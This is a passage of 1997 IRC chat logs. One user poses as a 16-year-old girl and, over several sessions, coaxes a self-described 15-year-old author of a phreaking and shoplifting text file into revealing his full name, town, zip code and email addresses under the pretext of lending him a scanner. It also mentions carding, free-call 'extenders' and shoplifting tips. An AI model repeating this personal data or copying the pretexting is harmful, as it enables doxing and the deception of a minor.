  2816. [14:18] -LineFeed- ))/allOps\#phreak-=> well i gotta go my brothaz........i have to do my night  
  2817.   skewl algebra.......bye 
  2818. [14:18] <ZeR0-HeX> yeah i am 
  2819. <PcExpoKey> Cool 
  2820. <PcExpoKey> I like! 
  2821. [14:18] -digipimp-- ( Wa|| Ops: #phreak ) bye d00d 
  2822. <PcExpoKey> hehe 
  2823. [14:18] <ZeR0-HeX> who are you? 
  2824. <PcExpoKey> A loyal reader 
  2825. [14:18] -digipimp-- ( Wa|| Ops: #phreak ) oops...I'm slow 
  2826. [14:18] -digipimp-- ( Wa|| Ops: #phreak ) scuse me...I used to be retarded when i was 3 
  2827. [14:18] -darkcyde- [BX-Wall/#phreak] really? you too!?!?! l33t! 
  2828. [14:19] -darkcyde- [BX-Wall/#phreak] i was retarded until yesterday! 
  2829. <PcExpoKey> You going to the PCexpo? 
  2830. [14:19] <ZeR0-HeX> um, where and when? 
  2831. [14:19] -digipimp-- ( Wa|| Ops: #phreak ) I was 3 yesterday too! 
  2832. <PcExpoKey> its in new york city 
  2833. <PcExpoKey> www.pcexpo.com 
  2834. [14:19] -darkcyde- [BX-Wall/#phreak] ELITE!!!!!!!!!!!!!!!!!!!!! 
  2835. [14:19] <ZeR0-HeX> i live in CT 
  2836. <PcExpoKey> :/ 
  2837. <PcExpoKey> Thats still pretty close 
  2838. <PcExpoKey> Where abouts in CT? 
  2839. <PcExpoKey> Im in Morris County NJ 
  2840. [14:20] <ZeR0-HeX> nobody knows 
  2841. [14:20] <ZeR0-HeX> just in CT 
  2842. [14:20] <ZeR0-HeX> are you going? 
  2843. <PcExpoKey> hehe 
  2844. <PcExpoKey> Yup 
  2845. <PcExpoKey> Its going to be cool 
  2846. [14:20] <ZeR0-HeX> age/sex? 
  2847. <PcExpoKey> On the east side or west side of ct? 
  2848. <PcExpoKey> 16/F 
  2849. <PcExpoKey> a/s? 
  2850. [14:21] <ZeR0-HeX> in CT 
  2851. [14:21] <ZeR0-HeX> i ain't telling 
  2852. [14:21] <ZeR0-HeX> 15/M 
  2853. <PcExpoKey> heh, ok 
  2854. <PcExpoKey> I understand 
  2855. <PcExpoKey> its raining here :/ 
  2856. [14:22] <ZeR0-HeX> here too 
  2857. <PcExpoKey> Its like quick rain though 
  2858. <PcExpoKey> Really hard and then it stops for a bit 
  2859. [14:23] <ZeR0-HeX> brb 
  2860. Session Close: Wed Jun 18 14:35:03 1997 
  2861.  
  2862. Session Start: Fri Jun 20 14:42:13 1997 
  2863. [14:42] <ZeR0-HeX> yeah 
  2864. [14:42] <ZeR0-HeX> hey 
  2865. [14:42] <ZeR0-HeX> sup 
  2866. <Keystrike> Hey :) 
  2867. <Keystrike> not much 
  2868. <Keystrike> pcexpo was ok 
  2869. [14:42] <ZeR0-HeX> oh 
  2870. [14:42] <ZeR0-HeX> kool 
  2871. <Keystrike> but, there wasnt anything new there or anything to phreak 
  2872. [14:42] <ZeR0-HeX> oh 
  2873. [14:42] <ZeR0-HeX> hehe 
  2874. <Keystrike> whats new? 
  2875. [14:43] <ZeR0-HeX> nothing much 
  2876. <Keystrike> You going to BeyondHOPE? 
  2877. [14:45] <ZeR0-HeX> uh 
  2878. [14:45] <ZeR0-HeX> never heard of it 
  2879. [14:45] <ZeR0-HeX> what is that? 
  2880. <Keystrike> its a hacker conference 
  2881. <Keystrike> www.hope.net 
  2882. <Keystrike> sponsered by 2600 mag 
  2883. <Keystrike> in nyc 
  2884. <Keystrike> hmm 
  2885. <Keystrike> Maybe you can talk there 
  2886. [14:46] <ZeR0-HeX> oh 
  2887. [14:46] <ZeR0-HeX> kewl 
  2888. <Keystrike> Whats Phreak 13 gonna be about again? 
  2889. [14:47] <ZeR0-HeX> when is it? 
  2890. [14:47] <ZeR0-HeX> i might be able to go 
  2891. [14:47] <ZeR0-HeX> huh? 
  2892. <Keystrike> August 
  2893. [14:47] <ZeR0-HeX> oh 
  2894. [14:47] <ZeR0-HeX> like 
  2895. *** Krusty is on IRC 
  2896. [14:47] <ZeR0-HeX> say if you get caught shoplifting.. 
  2897. [14:47] <ZeR0-HeX> i'll give you a hundred ways to get out of it 
  2898. <Keystrike> hehehe 
  2899. <Keystrike> cool ;) 
  2900. *** Krusty has left IRC 
  2901. <Keystrike> think you can make it there? 
  2902. <Keystrike>            <speakers@hope.net>, if you're interested in speaking  
  2903. <Keystrike> thats their email addy 
  2904. <Keystrike> mail em! 
  2905. -> [ZeR0-HeX] PING 
  2906. <Keystrike> hello? 
  2907. [14:50] <ZeR0-HeX> one sec. 
  2908. <Keystrike> okay 
  2909. [14:50] <ZeR0-HeX> can't really talk man 
  2910. [14:50] <ZeR0-HeX> e-mail me 
  2911. [14:50] <ZeR0-HeX> you no my addres 
  2912. [14:50] <ZeR0-HeX> :-) 
  2913. [14:50] <ZeR0-HeX> cya later 
  2914. [14:50] <ZeR0-HeX> i might be able to go thoug' 
  2915. [14:50] <ZeR0-HeX> www.hope.net 
  2916. [14:50] <ZeR0-HeX> i'll check it out 
  2917. [14:50] <ZeR0-HeX> cya 
  2918. <Keystrike> k 
  2919. <Keystrike> cya :) 
  2920. [14:50] <ZeR0-HeX> k, cya 
  2921. [14:50] <ZeR0-HeX> nice talkin' with ya 
  2922. *** ZER0-HEX has left IRC 
  2923. Session Close: Fri Jun 20 14:52:00 1997 
  2924.  
  2925. Session Start: Tue Jun 24 21:02:33 1997 
  2926. [21:02] <ZeR0-HeX> um 
  2927. [21:02] <ZeR0-HeX> hi 
  2928. [21:02] <ZeR0-HeX> do i know you? 
  2929. <Keystrike> are u the zero hex who writes phreak magazine? 
  2930. [21:04] <ZeR0-HeX> hello? 
  2931. [21:05] <ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting,  
  2932.   Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This  
  2933.   is the site. Please sign the guestbook. 
  2934. <Keystrike> hi 
  2935. <Keystrike> yes 
  2936. <Keystrike> i am pcexpokey 
  2937. <Keystrike> member? 
  2938. <Keystrike> 16/f.... 
  2939. [21:06] <ZeR0-HeX> i changed the name 
  2940. [21:06] <ZeR0-HeX> to Zer0 Issues 
  2941. [21:06] <ZeR0-HeX> Go to www.createch.net/zerohex/zer0.html If you need any tips on Shoplifting,  
  2942.   Free Premium Channels, Free Phone Calls, Free Clothes, and many more things like these. This  
  2943.   is the site. Please sign the guestbook. 
  2944. [21:06] <ZeR0-HeX> go check it out 
  2945. <Keystrike> cool 
  2946. [21:06] <ZeR0-HeX> oh yeah 
  2947. [21:06] <ZeR0-HeX> hey 
  2948. [21:06] <ZeR0-HeX> sup 
  2949. [21:07] <ZeR0-HeX> can you go to my web site 
  2950. [21:07] <ZeR0-HeX> and sign my guestbook 
  2951. [21:07] <ZeR0-HeX> and i'd appreciate it if you like told some of your friends bout my site 
  2952. [21:07] <ZeR0-HeX> i know 
  2953. [21:07] <ZeR0-HeX> say "age/sex" 
  2954. [21:07] <ZeR0-HeX> go in #reality and do it 
  2955. <Keystrike> sure 
  2956. [21:07] <ZeR0-HeX> wow, 1st time a woman has ever been interested in this site 
  2957. <Keystrike> hehe 
  2958. [21:08] <ZeR0-HeX> :-) 
  2959. [21:08] <ZeR0-HeX> :-) 
  2960. Session Close: Tue Jun 24 21:12:07 1997 
  2961.  
  2962. Session Start: Tue Jun 24 21:37:04 1997 
  2963. [21:37] <ZeR0-HeX> dont' tell anyone 
  2964. <Keystrike> I wont :) 
  2965. <Keystrike> How can I verify it though? 
  2966. [21:37] <ZeR0-HeX> first name is Faraz 
  2967. [21:37] <ZeR0-HeX> last name is Alam 
  2968. [21:37] <ZeR0-HeX> go to #teenflirters 
  2969. [21:37] <ZeR0-HeX> ask people there 
  2970. <Keystrike> Faraz? 
  2971. <Keystrike> hehe 
  2972. [21:37] <ZeR0-HeX> ask nancy 
  2973. <Keystrike> ok 
  2974. <Keystrike> I believe ya ;) 
  2975. [21:37] <ZeR0-HeX> and bluejewel 
  2976. [21:37] <ZeR0-HeX> uh huh 
  2977. [21:37] <ZeR0-HeX> go in ther 
  2978. [21:37] <ZeR0-HeX> e 
  2979. <Keystrike> hmmm 
  2980. <Keystrike> where in ct do you live? 
  2981. [21:40] <ZeR0-HeX> near hartford 
  2982. <Keystrike> hmmm 
  2983. <Keystrike> i dont know ct very well ;) 
  2984. [21:41] <ZeR0-HeX> i'll tell you the town and everything 
  2985. [21:41] <ZeR0-HeX> if ur interested in sending me ur scanner 
  2986. [21:41] <ZeR0-HeX> i dunno nj very well :-) 
  2987. [21:41] <ZeR0-HeX> diana 
  2988. [21:41] <ZeR0-HeX> seriously 
  2989. [21:41] <ZeR0-HeX> you can trust me 
  2990. [21:41] <ZeR0-HeX> i won't do anything 
  2991. [21:41] <ZeR0-HeX> how bout this.. 
  2992. [21:41] <ZeR0-HeX> i'll even send you the money 1st, for the shipping  
  2993.   and all 
  2994. <Keystrike> hmmmm 
  2995. <Keystrike> well, if i have your addy and stuff, i suppose its pretty  
  2996.   safe :) 
  2997. [21:42] <ZeR0-HeX> my address? 
  2998. [21:42] <ZeR0-HeX> ok, but you can't tell anyone 
  2999. <Keystrike> addy == address 
  3000. <Keystrike> I wont 
  3001. [21:42] <ZeR0-HeX> absolutely nobody 
  3002. <Keystrike> but 
  3003. <Keystrike> How can I be sure thats it? 
  3004. [21:42] <ZeR0-HeX> uh huh 
  3005. [21:42] <ZeR0-HeX> i no 
  3006. <Keystrike> hehe 
  3007. [21:42] <ZeR0-HeX> wait 
  3008. [21:42] <ZeR0-HeX> what's ur last name? 
  3009. [21:42] <ZeR0-HeX> 1st 
  3010. [21:42] <ZeR0-HeX> :-) 
  3011. [21:43] <ZeR0-HeX> same process over you 
  3012. <Keystrike> not some drop off point 
  3013. <Keystrike> hehe 
  3014. <Keystrike> u want my stuff too? 
  3015. <Keystrike> I guess you need that anyway so u can pay for the shipping 
  3016. <Keystrike> right? 
  3017. <Keystrike> My last name is... 
  3018. <Keystrike> <drumb rool> 
  3019. <Keystrike> roll rather 
  3020. [21:44] <ZeR0-HeX> uh huh 
  3021. [21:44] <ZeR0-HeX> u there?.. 
  3022. [21:44] <ZeR0-HeX> huh? 
  3023. [21:44] <ZeR0-HeX> drumb rool? 
  3024. [21:44] <ZeR0-HeX> haha 
  3025. <Keystrike> Fitger 
  3026. [21:44] <ZeR0-HeX> not funny 
  3027. <Keystrike> sorry 
  3028. [21:44] <ZeR0-HeX> :-) 
  3029. [21:44] <ZeR0-HeX> whta is it really 
  3030. <Keystrike> hehe 
  3031. [21:44] <ZeR0-HeX> Diana Fitger 
  3032. [21:44] <ZeR0-HeX> ?? 
  3033. <Keystrike> yup 
  3034. * Keystrike is german 
  3035. [21:45] <ZeR0-HeX> k 
  3036. [21:45] <ZeR0-HeX> Faraz Alam here 
  3037. [21:45] <ZeR0-HeX> hey 
  3038. [21:45] <ZeR0-HeX> kewl 
  3039. [21:45] <ZeR0-HeX> i was born in germany 
  3040. [21:45] <ZeR0-HeX> frankfurt, amazing heh? 
  3041. <Keystrike> cool :) 
  3042. <Keystrike> hehehe 
  3043. <Keystrike> Im like not all german though 
  3044. <Keystrike> italian too 
  3045. [21:45] <ZeR0-HeX> neither am I 
  3046. [21:45] <ZeR0-HeX> i'm pakistani 
  3047. <Keystrike> but thats my mothers side 
  3048. [21:45] <ZeR0-HeX> :-) 
  3049. <Keystrike> nifty :) 
  3050. [21:45] <ZeR0-HeX> uh huh 
  3051. [21:45] <ZeR0-HeX> ok 
  3052. *** ^scream^ is on IRC 
  3053. [21:46] <ZeR0-HeX> before i tell you everything bout me 
  3054. <Keystrike> hehe 
  3055. [21:46] <ZeR0-HeX> you will agree to send me the scanner then? 
  3056. <Keystrike> yes =p 
  3057. [21:46] <ZeR0-HeX> :-) 
  3058. <Keystrike> im not sure how to ship it 
  3059. <Keystrike> i have a handman too 
  3060. <Keystrike> i can send that? 
  3061. [21:46] -ec|ipse- (Wall:#Phreak) cawnf cawnf? 
  3062. [21:47] <ZeR0-HeX> um.. 
  3063. [21:47] <ZeR0-HeX> hehe 
  3064. [21:47] <ZeR0-HeX> whatever 
  3065. [21:47] <ZeR0-HeX> the pic you have 
  3066. [21:47] -shoelace- still on 
  3067. [21:47] <ZeR0-HeX> a color scanner 
  3068. [21:47] -shoelace- might be busted 
  3069. [21:47] <ZeR0-HeX> would be all 
  3070. <Keystrike> yes 
  3071. <Keystrike> oke,y 
  3072. [21:47] <ZeR0-HeX> k 
  3073. [21:47] <ZeR0-HeX> what's that called? 
  3074. [21:47] <ZeR0-HeX> ur color scanner? 
  3075. <Keystrike> logitech i believe 
  3076. <Keystrike> oh 
  3077. <Keystrike> the flatbed is also color 
  3078. [21:48] <ZeR0-HeX> oh 
  3079. [21:48] <ZeR0-HeX> do i uh.. 
  3080. <Keystrike> its an hp 4c 
  3081. [21:48] <ZeR0-HeX> have to insert photos 
  3082. [21:48] <ZeR0-HeX> or just like click a button like you did 
  3083. <Keystrike> its ez to use 
  3084. [21:48] <ZeR0-HeX> and it takes a pic 
  3085. <Keystrike> insert em 
  3086. [21:48] <ZeR0-HeX> do i insert photos? 
  3087. [21:48] <ZeR0-HeX> oh 
  3088. [21:48] <ZeR0-HeX> damn 
  3089. <Keystrike> yes 
  3090. [21:48] <ZeR0-HeX> i don't have that many pics of me 
  3091. [21:48] <ZeR0-HeX> :-( 
  3092. [21:48] <ZeR0-HeX> yuo can't just like shoot it 
  3093. <Keystrike> u can just take pics with a poloraid or whatever 
  3094. [21:48] <ZeR0-HeX> at yourself 
  3095. <Keystrike> well 
  3096. <Keystrike> you can sorta 
  3097. <Keystrike> put your head on the scanner 
  3098. <Keystrike> and scan :P 
  3099. [21:49] <ZeR0-HeX> you did didn't you? 
  3100. [21:49] <ZeR0-HeX> yeah 
  3101. [21:49] <ZeR0-HeX> you did that? ur holding that little button aren't  
  3102.   ya? 
  3103. [21:49] <ZeR0-HeX> like a timer? 
  3104. <Keystrike> well, that was the camera 
  3105. [21:49] <ZeR0-HeX> oh, ok 
  3106. [21:49] <ZeR0-HeX> hey 
  3107. [21:49] <ZeR0-HeX> how bout this 
  3108. [21:50] <ZeR0-HeX> um, go to the post office tomorow,  
  3109. [21:50] <ZeR0-HeX> and ask them 
  3110. [21:50] <ZeR0-HeX> how much it'd cost 
  3111. [21:50] <ZeR0-HeX> to send it in a box or whatever 
  3112. <Keystrike> i can look that up 
  3113. [21:50] <ZeR0-HeX> yeah 
  3114. <Keystrike> www.usps.gov 
  3115. [21:50] <ZeR0-HeX> i think so 
  3116. [21:50] <ZeR0-HeX> find a way 
  3117. [21:50] <ZeR0-HeX> yeah 
  3118. [21:50] <ZeR0-HeX> also 
  3119. [21:50] <ZeR0-HeX> uh, fedex.com 
  3120. [21:50] <ZeR0-HeX> or something 
  3121. <Keystrike> yup 
  3122. [21:50] <ZeR0-HeX> and uspostal.com 
  3123. [21:51] <ZeR0-HeX> etc. 
  3124. [21:51] <ZeR0-HeX> then uh.. 
  3125. [21:51] <ZeR0-HeX> hmm... can't really talk to you on the phone 
  3126. [21:51] <ZeR0-HeX> unless you call 
  3127. <Keystrike> the fedex people come to our house evey day 
  3128. [21:51] <ZeR0-HeX> cause my parents won't allow women to call me on the phon 
  3129. [21:51] <ZeR0-HeX> e 
  3130. <Keystrike> cause we always send out packs 
  3131. [21:51] <ZeR0-HeX> i can't even talk to um 
  3132. <Keystrike> heheheehhehe 
  3133. [21:51] <ZeR0-HeX> damn religion :-) 
  3134. <Keystrike> why not? 
  3135. [21:51] <ZeR0-HeX> oh, kool 
  3136. [21:51] <ZeR0-HeX> it's just 
  3137. [21:51] <ZeR0-HeX> really strict 
  3138. <Keystrike> auu :/ 
  3139. [21:52] <ZeR0-HeX> we're not allowed to have relationships 
  3140. <Keystrike> do they screen your calls? 
  3141. [21:52] <ZeR0-HeX> at such an early age 
  3142. [21:52] <ZeR0-HeX> it sucks 
  3143. [21:52] <ZeR0-HeX> i no 
  3144. [21:52] <ZeR0-HeX> so 
  3145. [21:52] <ZeR0-HeX> tomorrow 
  3146. [21:52] <ZeR0-HeX> just like ask  the guy 
  3147. [21:52] <ZeR0-HeX> how much it'd cost 
  3148. [21:52] <ZeR0-HeX> they cause gotta weight it and all 
  3149. [21:52] <ZeR0-HeX> huh? 
  3150. <Keystrike> i can see on their site 
  3151. [21:52] <ZeR0-HeX> no 
  3152. [21:52] <ZeR0-HeX> not that strict 
  3153. <Keystrike> its not that heavy 
  3154. [21:52] <ZeR0-HeX> :-) 
  3155. [21:52] <ZeR0-HeX> ok 
  3156. <Keystrike> =p 
  3157. [21:53] <ZeR0-HeX> fer honesty 
  3158. [21:53] <ZeR0-HeX> can you call me? 
  3159. [21:53] -Own3d- You have 2 notes waiting on Own3d. 
  3160. [21:53] -Own3d- For a list, /MSG Own3d NOTES [pass] INDEX 
  3161. [21:53] <ZeR0-HeX> or you can't calll long distance 
  3162. <Keystrike> hmmm 
  3163. *** ^scream^ has left IRC 
  3164. <Keystrike> i could try an extender 
  3165. [21:53] <ZeR0-HeX> k, cause i don't want you think that you can;t trust me 
  3166. [21:53] <ZeR0-HeX> you can 
  3167. <Keystrike> not sure if it will work to all over the us 
  3168. [21:53] <ZeR0-HeX> or 
  3169. [21:53] <ZeR0-HeX> how bout this 
  3170. [21:53] <ZeR0-HeX> you just send it 
  3171. [21:53] <ZeR0-HeX> then 
  3172. *** ^scream^ is on IRC 
  3173. [21:53] <ZeR0-HeX> when i send it back 
  3174. [21:53] <ZeR0-HeX> i'll leave the cash in there 
  3175. [21:53] <ZeR0-HeX> extender? 
  3176. [21:54] <ZeR0-HeX> what's that? 
  3177. <Keystrike> its like 
  3178. <Keystrike> a way to make free calls and shit 
  3179. [21:54] <ZeR0-HeX> oh 
  3180. [21:54] <ZeR0-HeX> kool 
  3181. [21:55] <ZeR0-HeX> do you have another phone line fer yer computer? 
  3182. <Keystrike> yes 
  3183. <Keystrike> but someones on it now 
  3184. [21:55] <ZeR0-HeX> damn 
  3185. [21:55] <ZeR0-HeX> u rich or something! 
  3186. [21:55] <ZeR0-HeX> :-) 
  3187. [21:55] <ZeR0-HeX> lucky woman 
  3188. [21:55] <ZeR0-HeX> :-) 
  3189. [21:55] <ZeR0-HeX> k 
  3190. <Keystrike> hehe 
  3191. <Keystrike> :) 
  3192. <Keystrike> whats your zip code? 
  3193. <Keystrike> it needs it to caculate the payment and stuff 
  3194. [21:56] <ZeR0-HeX> 060... 
  3195. [21:57] <ZeR0-HeX> :-) 
  3196. [21:57] <ZeR0-HeX> ur at the web site 
  3197. [21:57] <ZeR0-HeX> 06029 
  3198. <Keystrike> http://www.fedex.com/svcform.html 
  3199. <Keystrike> yuppers 
  3200. [21:57] <ZeR0-HeX> kooll 
  3201. [21:57] <ZeR0-HeX> k 
  3202. [21:57] <ZeR0-HeX> that's my zip code 
  3203. [21:57] <ZeR0-HeX> 06029 
  3204. [21:57] <ZeR0-HeX> what's urs? 
  3205. <Keystrike> 07960 
  3206. [21:58] <ZeR0-HeX> you can like make out a bullshit order to someone you hate 
  3207. [21:58] <ZeR0-HeX> 06029 
  3208. <Keystrike> i dont think so 
  3209. <Keystrike> it wants other stuff 
  3210. <Keystrike> this is just like a caculator 
  3211. [21:58] <ZeR0-HeX> oh 
  3212. <Keystrike> im not doing the actual order thingy now 
  3213. <Keystrike> EAST BERLIN , CT 
  3214. <Keystrike> ? 
  3215. [21:59] <ZeR0-HeX> lol.. 
  3216. [21:59] <ZeR0-HeX> damn.. 
  3217. <Keystrike> FedEx Economy Two-Day Service sm 
  3218. <Keystrike>           Service Commitment: Friday, 04:30 PM 06/27/97 
  3219. [21:59] <ZeR0-HeX> ur one town away from where my girlfriend lives 
  3220. [21:59] <ZeR0-HeX> she lives in Berlin CT 
  3221. <Keystrike> thats what it said for your addy :P 
  3222. <Keystrike> Origin: MORRISTOWN , NJ 
  3223. <Keystrike> thats what it sayd for mine 
  3224. [22:00] <ZeR0-HeX> that's not it 
  3225. <Keystrike> heh 
  3226. [22:00] <ZeR0-HeX> i live 40 min. away from her 
  3227. [22:00] <ZeR0-HeX> my zip is 06029 
  3228. <Keystrike> maybe thats the dropoff thing 
  3229. [22:00] <ZeR0-HeX> and i live in ellington, ct 
  3230. [22:00] <ZeR0-HeX> probably where fed ex is located 
  3231. [22:00] <ZeR0-HeX> their main office 
  3232. <Keystrike> yup 
  3233. [22:01] <ZeR0-HeX> hmm 
  3234. [22:01] <ZeR0-HeX> that thing is complex 
  3235. [22:01] <ZeR0-HeX> :-) 
  3236. [22:01] <ZeR0-HeX> lol 
  3237. <Keystrike> damn 
  3238. <Keystrike> this no work 
  3239. [22:03] <ZeR0-HeX> huh?.. 
  3240. <Keystrike> the caculator 
  3241. <Keystrike> it dosnt say a cost 
  3242. <Keystrike> sec 
  3243. [22:04] <ZeR0-HeX> yep 
  3244. [22:04] <ZeR0-HeX> hey 
  3245. [22:04] <ZeR0-HeX> if i got disconnected 
  3246. [22:04] <ZeR0-HeX> e-mail me at zer0-hex@juno.com 
  3247. [22:04] <ZeR0-HeX> ok? 
  3248. [22:04] <ZeR0-HeX> or farazalam@juno.com 
  3249. [22:04] <ZeR0-HeX> okkies? 
  3250. [22:04] <ZeR0-HeX> or go to the web site 
  3251. <Keystrike> ok 
  3252. <Keystrike> why would u disconnect? 
  3253. *** ^scream^ has left IRC 
  3254. [22:05] <ZeR0-HeX> k 
  3255. [22:05] <ZeR0-HeX> what's your e-mail address? 
  3256. [22:05] <ZeR0-HeX> cause 
  3257. [22:05] <ZeR0-HeX> my folks 
  3258. [22:05] <ZeR0-HeX> they don't want me online 
  3259. [22:05] <ZeR0-HeX> i'm home alone right now 
  3260. [22:05] <ZeR0-HeX> and they're gonna come any min. 
  3261. *** Krusty has left IRC 
  3262. <Keystrike> If you mail your 10 pound 0 ounce Priority Mail package  
  3263. <Keystrike> from MORRISTOWN, NJ 07960 to ELLINGTON, CT 06029 (zone 2), 
  3264. <Keystrike> we estimate your package will arrive in 2 Day(s). 
  3265. <Keystrike> The price is: 
  3266. <Keystrike> Priority Mail Service                 $7.80 
  3267. <Keystrike> Certified Mail                        $1.35 
  3268. <Keystrike> Restricted Delivery                   $2.75 
  3269. <Keystrike> Return Receipt                        $1.10 
  3270. <Keystrike> ------------------------------------------- 
  3271. <Keystrike> TOTAL CHARGES                        $13.00 
  3272. [22:22] <ZeR0-HeX> sup 
  3273. [22:22] <ZeR0-HeX> what happened? 
  3274. <Keystrike> hey 
  3275. <Keystrike> 13 dollars 
  3276. <Keystrike> wb 
  3277. Session Start: Tue Jul 01 01:12:37 1997 
  3278. [1:12] <ZeR0-HeX> hi!!!!! 
  3279. [1:12] <ZeR0-HeX> what's up?? 
  3280. [1:12] <ZeR0-HeX> where have you been? 
  3281. <Keystroke> I corrupted my bios 
  3282. <Keystroke> heh 
  3283. [1:13] <ZeR0-HeX> GOOD JOB 
  3284. [1:13] <ZeR0-HeX> :-) 
  3285. [1:13] <ZeR0-HeX> hey 
  3286. [1:13] <ZeR0-HeX> what's ur e-mail address? 
  3287. [1:13] <ZeR0-HeX> my web site is gone :-( 
  3288. <Keystroke> :( 
  3289. <Keystroke> Why? 
  3290. [1:13] <ZeR0-HeX> cause 
  3291. <Keystroke> wakka@hotmail.com 
  3292. <Keystroke> why? 
  3293. [1:13] <ZeR0-HeX> my web hosting service wan't making enuff 
  3294. [1:13] <ZeR0-HeX> money 
  3295. <Keystroke> heheh 
  3296. <Keystroke> :(( 
  3297. <Keystroke> damn 
  3298. [1:14] <ZeR0-HeX> i put up 3 more issues though 
  3299. <Keystroke> did u sign a contract or anything? 
  3300. [1:14] <ZeR0-HeX> you want me to dcc them to you? 
  3301. [1:14] <ZeR0-HeX> k, thanks 
  3302. <Keystroke> do you have em on a site now? 
  3303. [1:14] <ZeR0-HeX> you know mine 
  3304. [1:14] <ZeR0-HeX> awww 
  3305. [1:14] <ZeR0-HeX> it'll go back up 
  3306. [1:14] <ZeR0-HeX> i gotta find somewhere 
  3307. [1:14] <ZeR0-HeX> no 
  3308. <Keystroke> cool 
  3309. [1:14] <ZeR0-HeX> nope 
  3310. [1:15] <ZeR0-HeX> i'm looking fer something better than angelfire and geocities 
  3311. <Keystroke> your isp? 
  3312. <Keystroke> aol or ibm? 
  3313. [1:15] <ZeR0-HeX> they both suck 
  3314. [1:15] <ZeR0-HeX> hey, did you find anything bout fed-e 
  3315. [1:15] <ZeR0-HeX> x 
  3316. <Keystroke> 13$ us post 
  3317. [1:16] <ZeR0-HeX> and the prices? 
  3318. [1:16] <ZeR0-HeX> carded 
  3319. <Keystroke> carded? 
  3320. [1:16] <ZeR0-HeX> :-) 
  3321. [1:16] <ZeR0-HeX> oh 
  3322. [1:16] <ZeR0-HeX> what bout back? 
  3323. <Keystroke> does #reality have a page? 
  3324. <Keystroke> same thing 
  3325. [1:17] <ZeR0-HeX> uh huh, i don't pay fer it. i ripped it off 
  3326. <Keystroke> 13 dollars 
  3327. <Keystroke> heh 
  3328. <Keystroke> what if they confiscate my scanner?! 
  3329. [1:17] <ZeR0-HeX> oh 
  3330. [1:17] <ZeR0-HeX> k 
  3331. [1:17] <ZeR0-HeX> why would they? 
  3332. <Keystroke> if it was carded 
  3333. <Keystroke> hehah 
  3334. [1:17] <ZeR0-HeX> it's illegal. you can sue them for going through your mail 
  3335. [1:17] <ZeR0-HeX> what? 
  3336. [1:17] <ZeR0-HeX> lol 
  3337. <Keystroke> heh 
  3338. <Keystroke> want i call ya? 
  3339. [1:18] <ZeR0-HeX> funny woman 
  3340. [1:18] <ZeR0-HeX> :-) 
  3341. [1:18] <ZeR0-HeX> huh? 
  3342. <Keystroke> heh 
  3343. <Keystroke> funny? 
  3344. [1:18] <ZeR0-HeX> u wanna gimme a call? 
  3345. <Keystroke> why not? 
  3346. <Keystroke> hehe 
  3347. [1:18] <ZeR0-HeX> lol 
  3348. [1:18] <ZeR0-HeX> well, now, diana, i don't think we should start anything. i do have a  
  3349.   girlfriend and all 
  3350. [1:19] <ZeR0-HeX> :-) 
  3351. <Keystroke> hehe 
  3352. [1:19] <ZeR0-HeX> j/k 
  3353. <Keystroke> :p 
  3354. [1:19] <ZeR0-HeX> seriousl though, could you call me? 
  3355. <Keystroke> hmmm 
  3356. <Keystroke> i guess 
  3357. [1:21] <ZeR0-HeX> brb 
  3358. [1:21] <ZeR0-HeX> ok? 
  3359. <Keystroke> k 
  3360. [1:23] <ZeR0-HeX> ok 
  3361. [1:23] <ZeR0-HeX> backers 
  3362. [1:23] <ZeR0-HeX> so 
  3363. [1:23] <ZeR0-HeX> uh 
  3364. [1:23] <ZeR0-HeX> the scanner 
  3365. [1:23] <ZeR0-HeX> what do you wanna do? 
  3366. <Keystroke> mail 
  3367. <Keystroke> us post 
  3368. [1:24] <ZeR0-HeX> us postal or fed-ex 
  3369. [1:24] <ZeR0-HeX> ?? 
  3370. <Keystroke> us postal 
  3371. [1:25] <ZeR0-HeX> ok 
  3372. [1:26] <ZeR0-HeX> so, ur up fer it and all? 
  3373. <Keystroke> yup 
  3374. <Keystroke> hehe 
  3375. [1:26] <ZeR0-HeX> ok 
  3376. [1:26] <ZeR0-HeX> um 
  3377. [1:26] <ZeR0-HeX> 1st, you have to trust me. 
  3378. <Keystroke> i do 
  3379. [1:27] <ZeR0-HeX> so, we need to talk on the phone so you think i won't rip you off 
  3380. <Keystroke> ok 
  3381. [1:27] <ZeR0-HeX> no' 
  3382. [1:27] <ZeR0-HeX> just in case 
  3383. [1:27] <ZeR0-HeX> r u sure? 
  3384. [1:27] <ZeR0-HeX> absolutely? positively? 
  3385. <Keystroke> umm hmm 
  3386. <Keystroke> hehe 
  3387. [1:27] <ZeR0-HeX> even though i make texts bout shoplifting :-) 
  3388. <Keystroke> hah 
  3389. <Keystroke> :P 
  3390. [1:27] <ZeR0-HeX> see 
  3391. <Keystroke> k 
  3392. [1:28] <ZeR0-HeX> you still don't trust me 
  3393. [1:28] <ZeR0-HeX> that's why we gotta talk over da fone 
  3394. <Keystroke> I do 
  3395. [1:28] <ZeR0-HeX> ok 
  3396. [1:28] <ZeR0-HeX> just one thing 
  3397. [1:28] <ZeR0-HeX> um 
  3398. [1:28] <ZeR0-HeX> i'm not gonna be home this week 
  3399. [1:28] <ZeR0-HeX> i'm leaving on thursday to PA 
  3400. [1:28] <ZeR0-HeX> and am coming back on next monday 
  3401. [1:28] <ZeR0-HeX> so uh.. 
  3402. <Keystroke> yes? 
  3403. [1:29] <ZeR0-HeX> how do you want me to give you the money and all? 
  3404. <Keystroke> ship it back in the scanner box 
  3405. [1:29] <ZeR0-HeX> ok 
  3406. [1:29] <ZeR0-HeX> it'll cost me 13 bucks too? 
  3407. [1:29] <ZeR0-HeX> by us postal? 
  3408. [1:29] <ZeR0-HeX> or what? 
  3409. <Keystroke> yup :/ 
  3410. [1:30] <ZeR0-HeX> ok 
  3411. [1:30] <ZeR0-HeX> can it be anything else? 
  3412. [1:30] <ZeR0-HeX> or does it HAVE to be us post? 
  3413. <Keystroke> well thats the cheapest 
  3414. [1:30] <ZeR0-HeX> thank you for the 3 werd answers btw :-) 
  3415. [1:30] <ZeR0-HeX> ok 
  3416. [1:30] <ZeR0-HeX> how many days can i borrow it? 
  3417. <Keystroke> np 
  3418. <Keystroke> a week 
  3419. <Keystroke> :P 
  3420. [1:31] <ZeR0-HeX> thanks!!! 
  3421. [1:31] <ZeR0-HeX> :-) 
  3422. <Keystroke> np 
  3423. [1:31] <ZeR0-HeX> $26 bucks is a good deal i gess 
  3424. <Keystroke> tis ;) 
  3425. [1:31] <ZeR0-HeX> r u giving me 2 scanners or what? 
  3426. <Keystroke> 1 
  3427. <Keystroke> giving?! :P 
